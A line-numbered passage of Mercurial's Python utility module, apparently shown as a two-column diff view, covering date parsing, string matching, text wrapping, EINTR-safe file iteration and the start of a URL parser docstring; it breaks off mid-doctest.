1881 1893 timestamp = time.time()
1882 1894 if timestamp < 0:
1883 1895 hint = _("check your clock")
1884 1896 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1885 1897 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1886 1898 datetime.datetime.fromtimestamp(timestamp))
1887 1899 tz = delta.days * 86400 + delta.seconds
1888 1900 return timestamp, tz
1889 1901
1890 1902 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1891 1903 """represent a (unixtime, offset) tuple as a localized time.
1892 1904 unixtime is seconds since the epoch, and offset is the time zone's
1893 1905 number of seconds away from UTC.
1894 1906
1895 1907 >>> datestr((0, 0))
1896 1908 'Thu Jan 01 00:00:00 1970 +0000'
1897 1909 >>> datestr((42, 0))
1898 1910 'Thu Jan 01 00:00:42 1970 +0000'
1899 1911 >>> datestr((-42, 0))
1900 1912 'Wed Dec 31 23:59:18 1969 +0000'
1901 1913 >>> datestr((0x7fffffff, 0))
1902 1914 'Tue Jan 19 03:14:07 2038 +0000'
1903 1915 >>> datestr((-0x80000000, 0))
1904 1916 'Fri Dec 13 20:45:52 1901 +0000'
1905 1917 """
1906 1918 t, tz = date or makedate()
1907 1919 if "%1" in format or "%2" in format or "%z" in format:
1908 1920 sign = (tz > 0) and "-" or "+"
1909 1921 minutes = abs(tz) // 60
1910 1922 q, r = divmod(minutes, 60)
1911 1923 format = format.replace("%z", "%1%2")
1912 1924 format = format.replace("%1", "%c%02d" % (sign, q))
1913 1925 format = format.replace("%2", "%02d" % r)
1914 1926 d = t - tz
1915 1927 if d > 0x7fffffff:
1916 1928 d = 0x7fffffff
1917 1929 elif d < -0x80000000:
1918 1930 d = -0x80000000
1919 1931 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1920 1932 # because they use the gmtime() system call which is buggy on Windows
1921 1933 # for negative values.
1922 1934 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1923 1935 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1924 1936 return s
1925 1937
1926 1938 def shortdate(date=None):
1927 1939 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1928 1940 return datestr(date, format='%Y-%m-%d')
1929 1941
1930 1942 def parsetimezone(s):
1931 1943 """find a trailing timezone, if any, in string, and return a
1932 1944 (offset, remainder) pair"""
1933 1945
1934 1946 if s.endswith("GMT") or s.endswith("UTC"):
1935 1947 return 0, s[:-3].rstrip()
1936 1948
1937 1949 # Unix-style timezones [+-]hhmm
1938 1950 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1939 1951 sign = (s[-5] == "+") and 1 or -1
1940 1952 hours = int(s[-4:-2])
1941 1953 minutes = int(s[-2:])
1942 1954 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1943 1955
1944 1956 # ISO8601 trailing Z
1945 1957 if s.endswith("Z") and s[-2:-1].isdigit():
1946 1958 return 0, s[:-1]
1947 1959
1948 1960 # ISO8601-style [+-]hh:mm
1949 1961 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1950 1962 s[-5:-3].isdigit() and s[-2:].isdigit()):
1951 1963 sign = (s[-6] == "+") and 1 or -1
1952 1964 hours = int(s[-5:-3])
1953 1965 minutes = int(s[-2:])
1954 1966 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1955 1967
1956 1968 return None, s
1957 1969
1958 1970 def strdate(string, format, defaults=None):
1959 1971 """parse a localized time string and return a (unixtime, offset) tuple.
1960 1972 if the string cannot be parsed, ValueError is raised."""
1961 1973 if defaults is None:
1962 1974 defaults = {}
1963 1975
1964 1976 # NOTE: unixtime = localunixtime + offset
1965 1977 offset, date = parsetimezone(string)
1966 1978
1967 1979 # add missing elements from defaults
1968 1980 usenow = False # default to using biased defaults
1969 1981 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1970 1982 part = pycompat.bytestr(part)
1971 1983 found = [True for p in part if ("%"+p) in format]
1972 1984 if not found:
1973 1985 date += "@" + defaults[part][usenow]
1974 1986 format += "@%" + part[0]
1975 1987 else:
1976 1988 # We've found a specific time element, less specific time
1977 1989 # elements are relative to today
1978 1990 usenow = True
1979 1991
1980 1992 timetuple = time.strptime(encoding.strfromlocal(date),
1981 1993 encoding.strfromlocal(format))
1982 1994 localunixtime = int(calendar.timegm(timetuple))
1983 1995 if offset is None:
1984 1996 # local timezone
1985 1997 unixtime = int(time.mktime(timetuple))
1986 1998 offset = unixtime - localunixtime
1987 1999 else:
1988 2000 unixtime = localunixtime + offset
1989 2001 return unixtime, offset
1990 2002
1991 2003 def parsedate(date, formats=None, bias=None):
1992 2004 """parse a localized date/time and return a (unixtime, offset) tuple.
1993 2005
1994 2006 The date may be a "unixtime offset" string or in one of the specified
1995 2007 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1996 2008
1997 2009 >>> parsedate(b' today ') == parsedate(\
1998 2010 datetime.date.today().strftime('%b %d'))
1999 2011 True
2000 2012 >>> parsedate(b'yesterday ') == parsedate((datetime.date.today() -\
2001 2013 datetime.timedelta(days=1)\
2002 2014 ).strftime('%b %d'))
2003 2015 True
2004 2016 >>> now, tz = makedate()
2005 2017 >>> strnow, strtz = parsedate(b'now')
2006 2018 >>> (strnow - now) < 1
2007 2019 True
2008 2020 >>> tz == strtz
2009 2021 True
2010 2022 """
2011 2023 if bias is None:
2012 2024 bias = {}
2013 2025 if not date:
2014 2026 return 0, 0
2015 2027 if isinstance(date, tuple) and len(date) == 2:
2016 2028 return date
2017 2029 if not formats:
2018 2030 formats = defaultdateformats
2019 2031 date = date.strip()
2020 2032
2021 2033 if date == 'now' or date == _('now'):
2022 2034 return makedate()
2023 2035 if date == 'today' or date == _('today'):
2024 2036 date = datetime.date.today().strftime('%b %d')
2025 2037 elif date == 'yesterday' or date == _('yesterday'):
2026 2038 date = (datetime.date.today() -
2027 2039 datetime.timedelta(days=1)).strftime('%b %d')
2028 2040
2029 2041 try:
2030 2042 when, offset = map(int, date.split(' '))
2031 2043 except ValueError:
2032 2044 # fill out defaults
2033 2045 now = makedate()
2034 2046 defaults = {}
2035 2047 for part in ("d", "mb", "yY", "HI", "M", "S"):
2036 2048 # this piece is for rounding the specific end of unknowns
2037 2049 b = bias.get(part)
2038 2050 if b is None:
2039 2051 if part[0:1] in "HMS":
2040 2052 b = "00"
2041 2053 else:
2042 2054 b = "0"
2043 2055
2044 2056 # this piece is for matching the generic end to today's date
2045 2057 n = datestr(now, "%" + part[0:1])
2046 2058
2047 2059 defaults[part] = (b, n)
2048 2060
2049 2061 for format in formats:
2050 2062 try:
2051 2063 when, offset = strdate(date, format, defaults)
2052 2064 except (ValueError, OverflowError):
2053 2065 pass
2054 2066 else:
2055 2067 break
2056 2068 else:
2057 2069 raise error.ParseError(_('invalid date: %r') % date)
2058 2070 # validate explicit (probably user-specified) date and
2059 2071 # time zone offset. values must fit in signed 32 bits for
2060 2072 # current 32-bit linux runtimes. timezones go from UTC-12
2061 2073 # to UTC+14
2062 2074 if when < -0x80000000 or when > 0x7fffffff:
2063 2075 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2064 2076 if offset < -50400 or offset > 43200:
2065 2077 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2066 2078 return when, offset
2067 2079
2068 2080 def matchdate(date):
2069 2081 """Return a function that matches a given date match specifier
2070 2082
2071 2083 Formats include:
2072 2084
2073 2085 '{date}' match a given date to the accuracy provided
2074 2086
2075 2087 '<{date}' on or before a given date
2076 2088
2077 2089 '>{date}' on or after a given date
2078 2090
2079 2091 >>> p1 = parsedate(b"10:29:59")
2080 2092 >>> p2 = parsedate(b"10:30:00")
2081 2093 >>> p3 = parsedate(b"10:30:59")
2082 2094 >>> p4 = parsedate(b"10:31:00")
2083 2095 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2084 2096 >>> f = matchdate(b"10:30")
2085 2097 >>> f(p1[0])
2086 2098 False
2087 2099 >>> f(p2[0])
2088 2100 True
2089 2101 >>> f(p3[0])
2090 2102 True
2091 2103 >>> f(p4[0])
2092 2104 False
2093 2105 >>> f(p5[0])
2094 2106 False
2095 2107 """
2096 2108
2097 2109 def lower(date):
2098 2110 d = {'mb': "1", 'd': "1"}
2099 2111 return parsedate(date, extendeddateformats, d)[0]
2100 2112
2101 2113 def upper(date):
2102 2114 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2103 2115 for days in ("31", "30", "29"):
2104 2116 try:
2105 2117 d["d"] = days
2106 2118 return parsedate(date, extendeddateformats, d)[0]
2107 2119 except Abort:
2108 2120 pass
2109 2121 d["d"] = "28"
2110 2122 return parsedate(date, extendeddateformats, d)[0]
2111 2123
2112 2124 date = date.strip()
2113 2125
2114 2126 if not date:
2115 2127 raise Abort(_("dates cannot consist entirely of whitespace"))
2116 2128 elif date[0] == "<":
2117 2129 if not date[1:]:
2118 2130 raise Abort(_("invalid day spec, use '<DATE'"))
2119 2131 when = upper(date[1:])
2120 2132 return lambda x: x <= when
2121 2133 elif date[0] == ">":
2122 2134 if not date[1:]:
2123 2135 raise Abort(_("invalid day spec, use '>DATE'"))
2124 2136 when = lower(date[1:])
2125 2137 return lambda x: x >= when
2126 2138 elif date[0] == "-":
2127 2139 try:
2128 2140 days = int(date[1:])
2129 2141 except ValueError:
2130 2142 raise Abort(_("invalid day spec: %s") % date[1:])
2131 2143 if days < 0:
2132 2144 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2133 2145 % date[1:])
2134 2146 when = makedate()[0] - days * 3600 * 24
2135 2147 return lambda x: x >= when
2136 2148 elif " to " in date:
2137 2149 a, b = date.split(" to ")
2138 2150 start, stop = lower(a), upper(b)
2139 2151 return lambda x: x >= start and x <= stop
2140 2152 else:
2141 2153 start, stop = lower(date), upper(date)
2142 2154 return lambda x: x >= start and x <= stop
2143 2155
2144 2156 def stringmatcher(pattern, casesensitive=True):
2145 2157 """
2146 2158 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2147 2159 returns the matcher name, pattern, and matcher function.
2148 2160 missing or unknown prefixes are treated as literal matches.
2149 2161
2150 2162 helper for tests:
2151 2163 >>> def test(pattern, *tests):
2152 2164 ... kind, pattern, matcher = stringmatcher(pattern)
2153 2165 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2154 2166 >>> def itest(pattern, *tests):
2155 2167 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2156 2168 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2157 2169
2158 2170 exact matching (no prefix):
2159 2171 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2160 2172 ('literal', 'abcdefg', [False, False, True])
2161 2173
2162 2174 regex matching ('re:' prefix)
2163 2175 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2164 2176 ('re', 'a.+b', [False, False, True])
2165 2177
2166 2178 force exact matches ('literal:' prefix)
2167 2179 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2168 2180 ('literal', 're:foobar', [False, True])
2169 2181
2170 2182 unknown prefixes are ignored and treated as literals
2171 2183 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2172 2184 ('literal', 'foo:bar', [False, False, True])
2173 2185
2174 2186 case insensitive regex matches
2175 2187 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2176 2188 ('re', 'A.+b', [False, False, True])
2177 2189
2178 2190 case insensitive literal matches
2179 2191 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2180 2192 ('literal', 'ABCDEFG', [False, False, True])
2181 2193 """
2182 2194 if pattern.startswith('re:'):
2183 2195 pattern = pattern[3:]
2184 2196 try:
2185 2197 flags = 0
2186 2198 if not casesensitive:
2187 2199 flags = remod.I
2188 2200 regex = remod.compile(pattern, flags)
2189 2201 except remod.error as e:
2190 2202 raise error.ParseError(_('invalid regular expression: %s')
2191 2203 % e)
2192 2204 return 're', pattern, regex.search
2193 2205 elif pattern.startswith('literal:'):
2194 2206 pattern = pattern[8:]
2195 2207
2196 2208 match = pattern.__eq__
2197 2209
2198 2210 if not casesensitive:
2199 2211 ipat = encoding.lower(pattern)
2200 2212 match = lambda s: ipat == encoding.lower(s)
2201 2213 return 'literal', pattern, match
2202 2214
2203 2215 def shortuser(user):
2204 2216 """Return a short representation of a user name or email address."""
2205 2217 f = user.find('@')
2206 2218 if f >= 0:
2207 2219 user = user[:f]
2208 2220 f = user.find('<')
2209 2221 if f >= 0:
2210 2222 user = user[f + 1:]
2211 2223 f = user.find(' ')
2212 2224 if f >= 0:
2213 2225 user = user[:f]
2214 2226 f = user.find('.')
2215 2227 if f >= 0:
2216 2228 user = user[:f]
2217 2229 return user
2218 2230
2219 2231 def emailuser(user):
2220 2232 """Return the user portion of an email address."""
2221 2233 f = user.find('@')
2222 2234 if f >= 0:
2223 2235 user = user[:f]
2224 2236 f = user.find('<')
2225 2237 if f >= 0:
2226 2238 user = user[f + 1:]
2227 2239 return user
2228 2240
2229 2241 def email(author):
2230 2242 '''get email of author.'''
2231 2243 r = author.find('>')
2232 2244 if r == -1:
2233 2245 r = None
2234 2246 return author[author.find('<') + 1:r]
2235 2247
2236 2248 def ellipsis(text, maxlength=400):
2237 2249 """Trim string to at most maxlength (default: 400) columns in display."""
2238 2250 return encoding.trim(text, maxlength, ellipsis='...')
2239 2251
2240 2252 def unitcountfn(*unittable):
2241 2253 '''return a function that renders a readable count of some quantity'''
2242 2254
2243 2255 def go(count):
2244 2256 for multiplier, divisor, format in unittable:
2245 2257 if abs(count) >= divisor * multiplier:
2246 2258 return format % (count / float(divisor))
2247 2259 return unittable[-1][2] % count
2248 2260
2249 2261 return go
2250 2262
2251 2263 def processlinerange(fromline, toline):
2252 2264 """Check that linerange <fromline>:<toline> makes sense and return a
2253 2265 0-based range.
2254 2266
2255 2267 >>> processlinerange(10, 20)
2256 2268 (9, 20)
2257 2269 >>> processlinerange(2, 1)
2258 2270 Traceback (most recent call last):
2259 2271 ...
2260 2272 ParseError: line range must be positive
2261 2273 >>> processlinerange(0, 5)
2262 2274 Traceback (most recent call last):
2263 2275 ...
2264 2276 ParseError: fromline must be strictly positive
2265 2277 """
2266 2278 if toline - fromline < 0:
2267 2279 raise error.ParseError(_("line range must be positive"))
2268 2280 if fromline < 1:
2269 2281 raise error.ParseError(_("fromline must be strictly positive"))
2270 2282 return fromline - 1, toline
2271 2283
2272 2284 bytecount = unitcountfn(
2273 2285 (100, 1 << 30, _('%.0f GB')),
2274 2286 (10, 1 << 30, _('%.1f GB')),
2275 2287 (1, 1 << 30, _('%.2f GB')),
2276 2288 (100, 1 << 20, _('%.0f MB')),
2277 2289 (10, 1 << 20, _('%.1f MB')),
2278 2290 (1, 1 << 20, _('%.2f MB')),
2279 2291 (100, 1 << 10, _('%.0f KB')),
2280 2292 (10, 1 << 10, _('%.1f KB')),
2281 2293 (1, 1 << 10, _('%.2f KB')),
2282 2294 (1, 1, _('%.0f bytes')),
2283 2295 )
2284 2296
2285 2297 # Matches a single EOL which can either be a CRLF where repeated CR
2286 2298 # are removed or a LF. We do not care about old Macintosh files, so a
2287 2299 # stray CR is an error.
2288 2300 _eolre = remod.compile(br'\r*\n')
2289 2301
2290 2302 def tolf(s):
2291 2303 return _eolre.sub('\n', s)
2292 2304
2293 2305 def tocrlf(s):
2294 2306 return _eolre.sub('\r\n', s)
2295 2307
2296 2308 if pycompat.oslinesep == '\r\n':
2297 2309 tonativeeol = tocrlf
2298 2310 fromnativeeol = tolf
2299 2311 else:
2300 2312 tonativeeol = pycompat.identity
2301 2313 fromnativeeol = pycompat.identity
2302 2314
2303 2315 def escapestr(s):
2304 2316 # call underlying function of s.encode('string_escape') directly for
2305 2317 # Python 3 compatibility
2306 2318 return codecs.escape_encode(s)[0]
2307 2319
2308 2320 def unescapestr(s):
2309 2321 return codecs.escape_decode(s)[0]
2310 2322
2311 2323 def forcebytestr(obj):
2312 2324 """Portably format an arbitrary object (e.g. exception) into a byte
2313 2325 string."""
2314 2326 try:
2315 2327 return pycompat.bytestr(obj)
2316 2328 except UnicodeEncodeError:
2317 2329 # non-ascii string, may be lossy
2318 2330 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2319 2331
2320 2332 def uirepr(s):
2321 2333 # Avoid double backslash in Windows path repr()
2322 2334 return repr(s).replace('\\\\', '\\')
2323 2335
2324 2336 # delay import of textwrap
2325 2337 def MBTextWrapper(**kwargs):
2326 2338 class tw(textwrap.TextWrapper):
2327 2339 """
2328 2340 Extend TextWrapper for width-awareness.
2329 2341
2330 2342 Neither number of 'bytes' in any encoding nor 'characters' is
2331 2343 appropriate to calculate terminal columns for specified string.
2332 2344
2333 2345 Original TextWrapper implementation uses built-in 'len()' directly,
2334 2346 so overriding is needed to use width information of each characters.
2335 2347
2336 2348 In addition, characters classified into 'ambiguous' width are
2337 2349 treated as wide in East Asian area, but as narrow in other.
2338 2350
2339 2351 This requires use decision to determine width of such characters.
2340 2352 """
2341 2353 def _cutdown(self, ucstr, space_left):
2342 2354 l = 0
2343 2355 colwidth = encoding.ucolwidth
2344 2356 for i in xrange(len(ucstr)):
2345 2357 l += colwidth(ucstr[i])
2346 2358 if space_left < l:
2347 2359 return (ucstr[:i], ucstr[i:])
2348 2360 return ucstr, ''
2349 2361
2350 2362 # overriding of base class
2351 2363 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2352 2364 space_left = max(width - cur_len, 1)
2353 2365
2354 2366 if self.break_long_words:
2355 2367 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2356 2368 cur_line.append(cut)
2357 2369 reversed_chunks[-1] = res
2358 2370 elif not cur_line:
2359 2371 cur_line.append(reversed_chunks.pop())
2360 2372
2361 2373 # this overriding code is imported from TextWrapper of Python 2.6
2362 2374 # to calculate columns of string by 'encoding.ucolwidth()'
2363 2375 def _wrap_chunks(self, chunks):
2364 2376 colwidth = encoding.ucolwidth
2365 2377
2366 2378 lines = []
2367 2379 if self.width <= 0:
2368 2380 raise ValueError("invalid width %r (must be > 0)" % self.width)
2369 2381
2370 2382 # Arrange in reverse order so items can be efficiently popped
2371 2383 # from a stack of chucks.
2372 2384 chunks.reverse()
2373 2385
2374 2386 while chunks:
2375 2387
2376 2388 # Start the list of chunks that will make up the current line.
2377 2389 # cur_len is just the length of all the chunks in cur_line.
2378 2390 cur_line = []
2379 2391 cur_len = 0
2380 2392
2381 2393 # Figure out which static string will prefix this line.
2382 2394 if lines:
2383 2395 indent = self.subsequent_indent
2384 2396 else:
2385 2397 indent = self.initial_indent
2386 2398
2387 2399 # Maximum width for this line.
2388 2400 width = self.width - len(indent)
2389 2401
2390 2402 # First chunk on line is whitespace -- drop it, unless this
2391 2403 # is the very beginning of the text (i.e. no lines started yet).
2392 2404 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2393 2405 del chunks[-1]
2394 2406
2395 2407 while chunks:
2396 2408 l = colwidth(chunks[-1])
2397 2409
2398 2410 # Can at least squeeze this chunk onto the current line.
2399 2411 if cur_len + l <= width:
2400 2412 cur_line.append(chunks.pop())
2401 2413 cur_len += l
2402 2414
2403 2415 # Nope, this line is full.
2404 2416 else:
2405 2417 break
2406 2418
2407 2419 # The current line is full, and the next chunk is too big to
2408 2420 # fit on *any* line (not just this one).
2409 2421 if chunks and colwidth(chunks[-1]) > width:
2410 2422 self._handle_long_word(chunks, cur_line, cur_len, width)
2411 2423
2412 2424 # If the last chunk on this line is all whitespace, drop it.
2413 2425 if (self.drop_whitespace and
2414 2426 cur_line and cur_line[-1].strip() == r''):
2415 2427 del cur_line[-1]
2416 2428
2417 2429 # Convert current line back to a string and store it in list
2418 2430 # of all lines (return value).
2419 2431 if cur_line:
2420 2432 lines.append(indent + r''.join(cur_line))
2421 2433
2422 2434 return lines
2423 2435
2424 2436 global MBTextWrapper
2425 2437 MBTextWrapper = tw
2426 2438 return tw(**kwargs)
2427 2439
2428 2440 def wrap(line, width, initindent='', hangindent=''):
2429 2441 maxindent = max(len(hangindent), len(initindent))
2430 2442 if width <= maxindent:
2431 2443 # adjust for weird terminal size
2432 2444 width = max(78, maxindent + 1)
2433 2445 line = line.decode(pycompat.sysstr(encoding.encoding),
2434 2446 pycompat.sysstr(encoding.encodingmode))
2435 2447 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2436 2448 pycompat.sysstr(encoding.encodingmode))
2437 2449 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2438 2450 pycompat.sysstr(encoding.encodingmode))
2439 2451 wrapper = MBTextWrapper(width=width,
2440 2452 initial_indent=initindent,
2441 2453 subsequent_indent=hangindent)
2442 2454 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2443 2455
2444 2456 if (pyplatform.python_implementation() == 'CPython' and
2445 2457 sys.version_info < (3, 0)):
2446 2458 # There is an issue in CPython that some IO methods do not handle EINTR
2447 2459 # correctly. The following table shows what CPython version (and functions)
2448 2460 # are affected (buggy: has the EINTR bug, okay: otherwise):
2449 2461 #
2450 2462 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2451 2463 # --------------------------------------------------
2452 2464 # fp.__iter__ | buggy | buggy | okay
2453 2465 # fp.read* | buggy | okay [1] | okay
2454 2466 #
2455 2467 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2456 2468 #
2457 2469 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2458 2470 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2459 2471 #
2460 2472 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2461 2473 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2462 2474 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2463 2475 # fp.__iter__ but not other fp.read* methods.
2464 2476 #
2465 2477 # On modern systems like Linux, the "read" syscall cannot be interrupted
2466 2478 # when reading "fast" files like on-disk files. So the EINTR issue only
2467 2479 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2468 2480 # files approximately as "fast" files and use the fast (unsafe) code path,
2469 2481 # to minimize the performance impact.
2470 2482 if sys.version_info >= (2, 7, 4):
2471 2483 # fp.readline deals with EINTR correctly, use it as a workaround.
2472 2484 def _safeiterfile(fp):
2473 2485 return iter(fp.readline, '')
2474 2486 else:
2475 2487 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2476 2488 # note: this may block longer than necessary because of bufsize.
2477 2489 def _safeiterfile(fp, bufsize=4096):
2478 2490 fd = fp.fileno()
2479 2491 line = ''
2480 2492 while True:
2481 2493 try:
2482 2494 buf = os.read(fd, bufsize)
2483 2495 except OSError as ex:
2484 2496 # os.read only raises EINTR before any data is read
2485 2497 if ex.errno == errno.EINTR:
2486 2498 continue
2487 2499 else:
2488 2500 raise
2489 2501 line += buf
2490 2502 if '\n' in buf:
2491 2503 splitted = line.splitlines(True)
2492 2504 line = ''
2493 2505 for l in splitted:
2494 2506 if l[-1] == '\n':
2495 2507 yield l
2496 2508 else:
2497 2509 line = l
2498 2510 if not buf:
2499 2511 break
2500 2512 if line:
2501 2513 yield line
2502 2514
2503 2515 def iterfile(fp):
2504 2516 fastpath = True
2505 2517 if type(fp) is file:
2506 2518 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2507 2519 if fastpath:
2508 2520 return fp
2509 2521 else:
2510 2522 return _safeiterfile(fp)
2511 2523 else:
2512 2524 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2513 2525 def iterfile(fp):
2514 2526 return fp
2515 2527
2516 2528 def iterlines(iterator):
2517 2529 for chunk in iterator:
2518 2530 for line in chunk.splitlines():
2519 2531 yield line
2520 2532
2521 2533 def expandpath(path):
2522 2534 return os.path.expanduser(os.path.expandvars(path))
2523 2535
2524 2536 def hgcmd():
2525 2537 """Return the command used to execute current hg
2526 2538
2527 2539 This is different from hgexecutable() because on Windows we want
2528 2540 to avoid things opening new shell windows like batch files, so we
2529 2541 get either the python call or current executable.
2530 2542 """
2531 2543 if mainfrozen():
2532 2544 if getattr(sys, 'frozen', None) == 'macosx_app':
2533 2545 # Env variable set by py2app
2534 2546 return [encoding.environ['EXECUTABLEPATH']]
2535 2547 else:
2536 2548 return [pycompat.sysexecutable]
2537 2549 return gethgcmd()
2538 2550
2539 2551 def rundetached(args, condfn):
2540 2552 """Execute the argument list in a detached process.
2541 2553
2542 2554 condfn is a callable which is called repeatedly and should return
2543 2555 True once the child process is known to have started successfully.
2544 2556 At this point, the child process PID is returned. If the child
2545 2557 process fails to start or finishes before condfn() evaluates to
2546 2558 True, return -1.
2547 2559 """
2548 2560 # Windows case is easier because the child process is either
2549 2561 # successfully starting and validating the condition or exiting
2550 2562 # on failure. We just poll on its PID. On Unix, if the child
2551 2563 # process fails to start, it will be left in a zombie state until
2552 2564 # the parent wait on it, which we cannot do since we expect a long
2553 2565 # running process on success. Instead we listen for SIGCHLD telling
2554 2566 # us our child process terminated.
2555 2567 terminated = set()
2556 2568 def handler(signum, frame):
2557 2569 terminated.add(os.wait())
2558 2570 prevhandler = None
2559 2571 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2560 2572 if SIGCHLD is not None:
2561 2573 prevhandler = signal.signal(SIGCHLD, handler)
2562 2574 try:
2563 2575 pid = spawndetached(args)
2564 2576 while not condfn():
2565 2577 if ((pid in terminated or not testpid(pid))
2566 2578 and not condfn()):
2567 2579 return -1
2568 2580 time.sleep(0.1)
2569 2581 return pid
2570 2582 finally:
2571 2583 if prevhandler is not None:
2572 2584 signal.signal(signal.SIGCHLD, prevhandler)
2573 2585
2574 2586 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2575 2587 """Return the result of interpolating items in the mapping into string s.
2576 2588
2577 2589 prefix is a single character string, or a two character string with
2578 2590 a backslash as the first character if the prefix needs to be escaped in
2579 2591 a regular expression.
2580 2592
2581 2593 fn is an optional function that will be applied to the replacement text
2582 2594 just before replacement.
2583 2595
2584 2596 escape_prefix is an optional flag that allows using doubled prefix for
2585 2597 its escaping.
2586 2598 """
2587 2599 fn = fn or (lambda s: s)
2588 2600 patterns = '|'.join(mapping.keys())
2589 2601 if escape_prefix:
2590 2602 patterns += '|' + prefix
2591 2603 if len(prefix) > 1:
2592 2604 prefix_char = prefix[1:]
2593 2605 else:
2594 2606 prefix_char = prefix
2595 2607 mapping[prefix_char] = prefix_char
2596 2608 r = remod.compile(r'%s(%s)' % (prefix, patterns))
2597 2609 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2598 2610
2599 2611 def getport(port):
2600 2612 """Return the port for a given network service.
2601 2613
2602 2614 If port is an integer, it's returned as is. If it's a string, it's
2603 2615 looked up using socket.getservbyname(). If there's no matching
2604 2616 service, error.Abort is raised.
2605 2617 """
2606 2618 try:
2607 2619 return int(port)
2608 2620 except ValueError:
2609 2621 pass
2610 2622
2611 2623 try:
2612 2624 return socket.getservbyname(port)
2613 2625 except socket.error:
2614 2626 raise Abort(_("no port number associated with service '%s'") % port)
2615 2627
2616 2628 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2617 2629 '0': False, 'no': False, 'false': False, 'off': False,
2618 2630 'never': False}
2619 2631
2620 2632 def parsebool(s):
2621 2633 """Parse s into a boolean.
2622 2634
2623 2635 If s is not a valid boolean, returns None.
2624 2636 """
2625 2637 return _booleans.get(s.lower(), None)
2626 2638
2627 2639 _hextochr = dict((a + b, chr(int(a + b, 16)))
2628 2640 for a in string.hexdigits for b in string.hexdigits)
2629 2641
2630 2642 class url(object):
2631 2643 r"""Reliable URL parser.
2632 2644
2633 2645 This parses URLs and provides attributes for the following
2634 2646 components:
2635 2647
2636 2648 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2637 2649
2638 2650 Missing components are set to None. The only exception is
2639 2651 fragment, which is set to '' if present but empty.
2640 2652
2641 2653 If parsefragment is False, fragment is included in query. If
2642 2654 parsequery is False, query is included in path. If both are
2643 2655 False, both fragment and query are included in path.
2644 2656
2645 2657 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2646 2658
2647 2659 Note that for backward compatibility reasons, bundle URLs do not
2648 2660 take host names. That means 'bundle://../' has a path of '../'.
2649 2661
2650 2662 Examples:
2651 2663
2652 2664 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2653 2665 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2654 2666 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2655 2667 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2656 2668 >>> url(b'file:///home/joe/repo')
2657 2669 <url scheme: 'file', path: '/home/joe/repo'>
2658 2670 >>> url(b'file:///c:/temp/foo/')
2659 2671 <url scheme: 'file', path: 'c:/temp/foo/'>
2660 2672 >>> url(b'bundle:foo')
2661 2673 <url scheme: 'bundle', path: 'foo'>
2662 2674 >>> url(b'bundle://../foo')
2663 2675 <url scheme: 'bundle', path: '../foo'>
2664 2676 >>> url(br'c:\foo\bar')
2665 2677 <url path: 'c:\\foo\\bar'>
2666 2678 >>> url(br'\\blah\blah\blah')
2667 2679 <url path: '\\\\blah\\blah\\blah'>
2668 2680 >>> url(br'\\blah\blah\blah#baz')
2669 2681 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2670 2682 >>> url(br'file:///C:\users\me')
2671 2683 <url scheme: 'file', path: 'C:\\users\\me'>
2672 2684
2673 2685 Authentication credentials:
2674 2686
2675 2687 >>> url(b'ssh://joe:xyz@x/repo')
2676 2688 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2677 2689 >>> url(b'ssh://joe@x/repo')
